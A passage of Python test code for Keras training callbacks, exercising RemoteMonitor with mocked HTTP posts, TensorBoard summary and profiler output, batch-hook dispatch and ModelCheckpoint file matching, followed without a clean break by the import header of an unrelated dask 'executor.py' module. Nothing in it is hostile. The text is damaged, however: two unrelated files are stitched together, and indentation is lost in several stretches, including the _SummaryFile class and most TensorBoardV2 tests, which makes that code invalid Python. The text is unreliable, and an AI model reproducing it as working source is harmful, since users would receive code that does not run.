    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = np_utils.to_categorical(y_test)
    y_train = np_utils.to_categorical(y_train)
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='sgd',
        metrics=['accuracy'])

    # Start an arbitrary process that should run during model
    # training and be terminated after training has completed.
    e = threading.Event()

    def target():
      e.wait()

    t = threading.Thread(target=target)
    t.start()
    # on_train_end sets the event, releasing the waiting thread.
    cleanup_callback = keras.callbacks.LambdaCallback(
        on_train_end=lambda logs: e.set())

    cbks = [cleanup_callback]
    model.fit(
        x_train,
        y_train,
        batch_size=BATCH_SIZE,
        validation_data=(x_test, y_test),
        callbacks=cbks,
        epochs=5,
        verbose=0)
    t.join()
    assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
  """Numpy array log values are converted to plain scalars in the payload."""
  if requests is None:
    self.skipTest('`requests` required to run this test')

  with test.mock.patch.object(requests, 'post') as requests_post:
    monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
    a = np.arange(1)  # a 1 by 1 array
    logs = {'loss': 0., 'val': a}
    monitor.on_epoch_end(0, logs=logs)
    # The posted JSON must carry the unwrapped scalar, not the ndarray.
    send = {'loss': 0., 'epoch': 0, 'val': 0}
    requests_post.assert_called_once_with(
        monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
  """Numpy float32 log values are converted to Python floats in the payload."""
  if requests is None:
    self.skipTest('`requests` required to run this test')

  with test.mock.patch.object(requests, 'post') as requests_post:
    monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
    a = np.float32(1.0)  # a float32 generic type
    logs = {'loss': 0., 'val': a}
    monitor.on_epoch_end(0, logs=logs)
    # The posted JSON must carry the unwrapped float, not the np.float32.
    send = {'loss': 0., 'epoch': 0, 'val': 1.0}
    requests_post.assert_called_once_with(
        monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
  """RemoteMonitor(send_as_json=True) posts during a full `fit` run."""
  if requests is None:
    # skipTest raises unittest.SkipTest, so nothing below runs when
    # `requests` is unavailable (the old `return None` here was dead code).
    self.skipTest('`requests` required to run this test')

  with self.cached_session():
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.np_utils.to_categorical(y_test)
    y_train = keras.utils.np_utils.to_categorical(y_train)
    model = keras.models.Sequential()
    model.add(
        keras.layers.Dense(
            NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
    model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
    model.compile(
        loss='categorical_crossentropy',
        optimizer='rmsprop',
        metrics=['accuracy'])
    cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]

    # Mock the network call; the test only checks fit() tolerates the
    # callback, not the server response.
    with test.mock.patch.object(requests, 'post'):
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=1)
def test_progbar_infers_steps(self):
  """ProgbarLogger learns the step count from a dataset of unknown size."""
  x, y = np.ones((10, 1)), np.ones((10, 1))
  data = dataset_ops.DatasetV2.from_tensor_slices((x, y)).batch(2)
  data = data.filter(lambda x, y: True)  # Unknown cardinality.

  progbar = keras.callbacks.ProgbarLogger('steps')
  model = keras.Sequential([keras.layers.Dense(1)])
  model.compile('sgd', 'mse')
  self.assertIsNone(progbar.target)
  model.fit(data, epochs=2, callbacks=[progbar])
  # 10 samples / batch size 2 = 5 steps, inferred after the first epoch.
  self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
  """Batch/epoch hooks receive a Python int index and a float loss."""

  class MyCallback(keras.callbacks.Callback):

    def on_batch_end(self, batch, logs=None):
      assert isinstance(batch, int)
      assert isinstance(logs['loss'], float)
      self.on_batch_end_called = True

    def on_epoch_end(self, batch, logs=None):
      assert isinstance(batch, int)
      assert isinstance(logs['loss'], float)
      self.on_epoch_end_called = True

  x, y = np.ones((10, 1)), np.ones((10, 1))
  model = keras.Sequential([keras.layers.Dense(1)])
  model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())

  callback = MyCallback()
  model.fit(x, y, epochs=2, callbacks=[callback])
  self.assertTrue(callback.on_batch_end_called)
  # Bug fix: the second assertion previously re-checked on_batch_end_called,
  # leaving the epoch hook unverified.
  self.assertTrue(callback.on_epoch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
  """CallbackList only dispatches batch hooks when a callback defines them."""

  class MyCallbackWithBatchHooks(keras.callbacks.Callback):
    # Counts every train/test/predict batch-end invocation.

    def __init__(self):
      self.train_batches = 0
      self.test_batches = 0
      self.predict_batches = 0

    def on_train_batch_end(self, batch, logs=None):
      self.train_batches += 1

    def on_test_batch_end(self, batch, logs=None):
      self.test_batches += 1

    def on_predict_batch_end(self, batch, logs=None):
      self.predict_batches += 1

  class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
    # Defines only an epoch hook, so batch dispatch should be skipped.

    def __init__(self):
      self.epochs = 0

    def on_epoch_end(self, epoch, logs=None):
      self.epochs += 1

  x, y = np.ones((10, 1)), np.ones((10, 1))
  model = keras.Sequential([keras.layers.Dense(1)])
  model.compile('sgd', 'mse')

  my_cb = MyCallbackWithBatchHooks()
  cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
  self.assertTrue(cb_list._should_call_train_batch_hooks)
  self.assertTrue(cb_list._should_call_test_batch_hooks)
  self.assertTrue(cb_list._should_call_predict_batch_hooks)

  model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
  model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
  model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)

  self.assertEqual(my_cb.train_batches, 2)
  self.assertEqual(my_cb.test_batches, 1)
  self.assertEqual(my_cb.predict_batches, 1)

  my_cb = MyCallbackWithoutBatchHooks()
  cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
  self.assertLen(cb_list.callbacks, 1)
  self.assertFalse(cb_list._should_call_train_batch_hooks)
  self.assertFalse(cb_list._should_call_test_batch_hooks)
  self.assertFalse(cb_list._should_call_predict_batch_hooks)

  model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
  model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
  model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
  """`_implements_*_batch_hooks` overrides control batch-hook dispatch."""

  class MyCallback(keras.callbacks.Callback):
    # `should_run` gates the _implements_*_batch_hooks overrides below.

    def __init__(self, should_run=True):
      self.should_run = should_run
      self.train_batches = 0
      self.test_batches = 0
      self.predict_batches = 0

    def on_train_batch_end(self, batch, logs=None):
      self.train_batches += 1

    def on_test_batch_end(self, batch, logs=None):
      self.test_batches += 1

    def on_predict_batch_end(self, batch, logs=None):
      self.predict_batches += 1

    def _implements_train_batch_hooks(self):
      return self.should_run

    def _implements_test_batch_hooks(self):
      return self.should_run

    def _implements_predict_batch_hooks(self):
      return self.should_run

  x, y = np.ones((10, 1)), np.ones((10, 1))
  model = keras.Sequential([keras.layers.Dense(1)])
  model.compile('sgd', 'mse')

  my_cb = MyCallback(should_run=True)
  cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
  self.assertTrue(cb_list._should_call_train_batch_hooks)
  self.assertTrue(cb_list._should_call_test_batch_hooks)
  self.assertTrue(cb_list._should_call_predict_batch_hooks)

  model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
  model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
  model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)

  self.assertEqual(my_cb.train_batches, 2)
  self.assertEqual(my_cb.test_batches, 1)
  self.assertEqual(my_cb.predict_batches, 1)

  my_cb = MyCallback(should_run=False)
  cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
  self.assertFalse(cb_list._should_call_train_batch_hooks)
  self.assertFalse(cb_list._should_call_test_batch_hooks)
  self.assertFalse(cb_list._should_call_predict_batch_hooks)

  model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
  model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
  model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)

  # Hooks were suppressed, so no batch-end counter may have advanced.
  self.assertEqual(my_cb.train_batches, 0)
  self.assertEqual(my_cb.test_batches, 0)
  self.assertEqual(my_cb.predict_batches, 0)
# A summary that was emitted during a test. Fields:
#   logdir: str. The logdir of the FileWriter to which the summary was
#     written.
#   tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
  """Read all summaries under the logdir into a `_SummaryFile`.

  Args:
    logdir: A path to a directory that contains zero or more event
      files, either as direct children or in transitive subdirectories.
      Summaries in these events must only contain old-style scalars,
      images, and histograms. Non-summary events, like `graph_def`s, are
      ignored.

  Returns:
    A `_SummaryFile` object reflecting all summaries written to any
    event files in the logdir or any of its descendant directories.

  Raises:
    ValueError: If an event file contains an summary of unexpected kind.
  """
  result = _SummaryFile()
  for (dirpath, _, filenames) in os.walk(logdir):
    for filename in filenames:
      # Only TensorFlow event files are of interest.
      if not filename.startswith('events.out.'):
        continue
      path = os.path.join(dirpath, filename)
      for event in summary_iterator.summary_iterator(path):
        if not event.summary:  # (e.g., it's a `graph_def` event)
          continue
        for value in event.summary.value:
          tag = value.tag
          # Case on the `value` rather than the summary metadata because
          # the Keras callback uses `summary_ops_v2` to emit old-style
          # summaries. See b/124535134.
          kind = value.WhichOneof('value')
          container = {
              'simple_value': result.scalars,
              'image': result.images,
              'histo': result.histograms,
              'tensor': result.tensors,
          }.get(kind)
          if container is None:
            raise ValueError(
                'Unexpected summary kind %r in event file %s:\n%r'
                % (kind, path, event))
          elif kind == 'tensor' and tag != 'keras':
            # Check for V2 scalar summaries, which have a different PB
            # structure.
            if event.summary.value[
                0].metadata.plugin_data.plugin_name == 'scalars':
              container = result.scalars
          container.add(_ObservedSummary(logdir=dirpath, tag=tag))
  return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
  """Create per-test logdir paths with train/validation subdirectories."""
  super(TestTensorBoardV2, self).setUp()
  self.logdir = os.path.join(self.get_temp_dir(), 'tb')
  self.train_dir = os.path.join(self.logdir, 'train')
  self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
  """Build and compile a small conv model for (10, 10, 1) inputs."""
  layers = [
      keras.layers.Conv2D(8, (3, 3)),
      keras.layers.Flatten(),
      keras.layers.Dense(1)
  ]
  model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
  opt = gradient_descent.SGD(learning_rate=0.001)
  model.compile(
      opt,
      'mse',
      run_eagerly=testing_utils.should_run_eagerly())
  return model
def test_TensorBoard_default_logdir(self):
  """Regression test for cross-platform pathsep in default logdir."""
  # Restore the original working directory afterwards so the chdir does
  # not leak into other tests running in this process.
  self.addCleanup(os.chdir, os.getcwd())
  os.chdir(self.get_temp_dir())

  model = self._get_model()
  x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
  tb_cbk = keras.callbacks.TensorBoard()  # no logdir specified

  model.fit(
      x,
      y,
      batch_size=2,
      epochs=2,
      validation_data=(x, y),
      callbacks=[tb_cbk])

  summary_file = list_summaries(logdir='.')
  train_dir = os.path.join('.', 'logs', 'train')
  validation_dir = os.path.join('.', 'logs', 'validation')
  self.assertEqual(
      summary_file.scalars, {
          _ObservedSummary(logdir=train_dir, tag='epoch_loss'),
          _ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
      })
def test_TensorBoard_basic(self):
  """Fitting with TensorBoard writes epoch_loss for train and validation."""
  model = self._get_model()
  x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
  tb_cbk = keras.callbacks.TensorBoard(self.logdir)

  model.fit(
      x,
      y,
      batch_size=2,
      epochs=2,
      validation_data=(x, y),
      callbacks=[tb_cbk])
  summary_file = list_summaries(self.logdir)

  self.assertEqual(
      summary_file.scalars, {
          _ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
          _ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
      })
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.logdir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def test_custom_summary(self):
if not context.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = summary_pb2.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with summary_ops_v2.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return summary_ops_v2.write(
tag=tag,
tensor=math_ops.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', math_ops.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
  """TensorBoard V2 tests (graph writing, profiling) with explicit models."""

  def setUp(self):
    super(TestTensorBoardV2NonParameterizedTest, self).setUp()
    # Fresh per-test log directory with the callback's run subdirectories.
    self.logdir = os.path.join(self.get_temp_dir(), 'tb')
    self.train_dir = os.path.join(self.logdir, 'train')
    self.validation_dir = os.path.join(self.logdir, 'validation')

  def _get_seq_model(self):
    """Build and compile a small Sequential conv net with a known input."""
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    opt = gradient_descent.SGD(learning_rate=0.001)
    model.compile(
        opt,
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    return model

  def _get_trace_file(self, logdir):
    """Return the first profiler trace file under *logdir*, or None."""
    profile_dir = os.path.join(logdir, 'plugins', 'profile')
    for (dirpath, dirnames, filenames) in os.walk(profile_dir):
      del dirnames  # unused
      for filename in filenames:
        if filename.endswith('.trace.json.gz'):
          return os.path.join(dirpath, filename)
    return None

  def fitModelAndAssertKerasModelWritten(self, model):
    """Fit *model* with write_graph=True and assert the 'keras' tensor tag."""
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(self.logdir,
                                         write_graph=True,
                                         profile_batch=0)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag='keras'),
        },
    )

  def test_TensorBoard_writeSequentialModel_noInputShape(self):
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_writeSequentialModel_withInputShape(self):
    model = keras.models.Sequential([
        keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
        keras.layers.Flatten(),
        keras.layers.Dense(1),
    ])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  # NOTE(review): method name has a typo ("TensoriBoard"); renaming would
  # change the reported test id, so fix it in a dedicated change upstream.
  def test_TensoriBoard_writeModel(self):
    inputs = keras.layers.Input([10, 10, 1])
    x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
    x = keras.layers.Flatten()(x)
    x = keras.layers.Dense(1)(x)
    model = keras.models.Model(inputs=inputs, outputs=[x])
    model.compile('sgd', 'mse', run_eagerly=False)
    self.fitModelAndAssertKerasModelWritten(model)

  def test_TensorBoard_autoTrace(self):
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
        },
    )
    self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))

  def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
        },
    )
    self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))

  def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
    model.fit(
        x,
        y,
        batch_size=3,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            # Trace will be logged once at the batch it stops profiling.
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
        },
    )
    self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))

  def test_TensorBoard_autoTrace_profileBatchRange(self):
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
    model.fit(
        x,
        y,
        batch_size=4,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    self.assertEqual(
        summary_file.tensors,
        {
            # Trace will be logged once at the batch it stops profiling.
            _ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
        },
    )
    self.assertIsNotNone(self._get_trace_file(logdir=self.train_dir))

  def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
    # Negative start, non-numeric end, inverted range, and negative scalar
    # are all rejected at construction time.
    with self.assertRaises(ValueError):
      keras.callbacks.TensorBoard(
          self.logdir,
          histogram_freq=1,
          profile_batch='-1,3',
          write_graph=False)
    with self.assertRaises(ValueError):
      keras.callbacks.TensorBoard(
          self.logdir,
          histogram_freq=1,
          profile_batch='1,None',
          write_graph=False)
    with self.assertRaises(ValueError):
      keras.callbacks.TensorBoard(
          self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
    with self.assertRaises(ValueError):
      keras.callbacks.TensorBoard(
          self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)

  def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
    model = self._get_seq_model()
    x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
    tb_cbk = keras.callbacks.TensorBoard(
        self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
    model.fit(
        x,
        y,
        batch_size=2,
        epochs=2,
        validation_data=(x, y),
        callbacks=[tb_cbk])
    summary_file = list_summaries(self.logdir)
    # Enabled trace only on the 10000th batch, thus it should be empty.
    self.assertEmpty(summary_file.tensors)
    self.assertIsNone(self._get_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(test.TestCase):
  """Tests for ModelCheckpoint._get_most_recently_modified_file_matching_pattern."""

  def test_get_most_recently_modified_file_matching_pattern(self):
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    file_paths = [
        os.path.join(test_dir, file_name) for file_name in
        ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        # Ensure there are some intervals between file creation.
        time.sleep(2)
        f.write('foo bar')
    # Ensure the files have been actually written.
    self.assertEqual(
        set([
            os.path.join(test_dir, file_name)
            for file_name in os.listdir(test_dir)
        ]), set(file_paths))
    # The most recently written file (last in the list) must be returned.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        file_paths[-1])

  def test_some_file_not_matching_pattern(self):
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    # The last file ('f.baatch...') deliberately does NOT match the pattern.
    file_paths = [
        os.path.join(test_dir, file_name) for file_name in
        ['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        # Ensure there are some intervals between file creation.
        time.sleep(2)
        f.write('foo bar')
    # The newest *matching* file is the second-to-last one written.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        file_paths[-2])

  def test_get_same_file_if_file_name_equals_pattern(self):
    file_name = 'f.batch02.h5'
    test_dir = self.get_temp_dir()
    file_path = os.path.join(test_dir, file_name)
    with open(file_path, 'w') as f:
      f.write('foo bar')
    self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(
            None)._get_most_recently_modified_file_matching_pattern(file_path),
        file_path)

  def test_get_none_if_file_does_not_exist(self):
    file_name = 'f.batch02.h5'
    test_dir = self.get_temp_dir()
    file_path = os.path.join(test_dir, file_name)
    self.assertLen(os.listdir(test_dir), 0)
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(
            None)._get_most_recently_modified_file_matching_pattern(file_path),
        None)

  def test_using_checkpoint_management_latest_checkpoint(self):
    file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
    ckpt_file_name = 'f.batchXepochY'
    test_dir = self.get_temp_dir()
    path_pattern = os.path.join(test_dir, file_pattern)
    ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
    with open(ckpt_file_path, 'w') as f:
      f.write('dummy ckpt')
    checkpoint_management.update_checkpoint_state_internal(
        test_dir, ckpt_file_path)
    file_paths = [
        os.path.join(test_dir, file_name)
        for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
    ]
    for file_path in file_paths:
      with open(file_path, 'w') as f:
        f.write('foo bar')
    # The result returned from checkpoint_management.latest_checkpoint takes
    # priority, so even if it was written earlier, we should still return that.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        ckpt_file_path)
if __name__ == '__main__':
  # Run all tests in this module under the TensorFlow test harness.
  test.main()
|
executor.py | from __future__ import print_function, division, absolute_import
from collections import defaultdict
from concurrent.futures._base import DoneAndNotDoneFutures, CancelledError
from concurrent import futures
from functools import wraps, partial
import itertools
import logging
import os
from time import sleep
import uuid
import dask
from dask.base import tokenize, normalize_token, Base
from dask.core import flatten
from dask.compatibility import apply
from toolz import first, groupby, merge
from tornado import gen
from tornado.gen import Return
from tornado.locks import Event
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado.iostream import StreamClosedError, IOStream
from tornado.queues import Queue
from .client import (WrappedKey, unpack_remotedata, pack_data)
from .core import read, write, connect, rpc, coerce_to_rpc
from .scheduler import Scheduler
from .utils import All, sync, funcname, ignoring
logger = logging.getLogger(__name__)
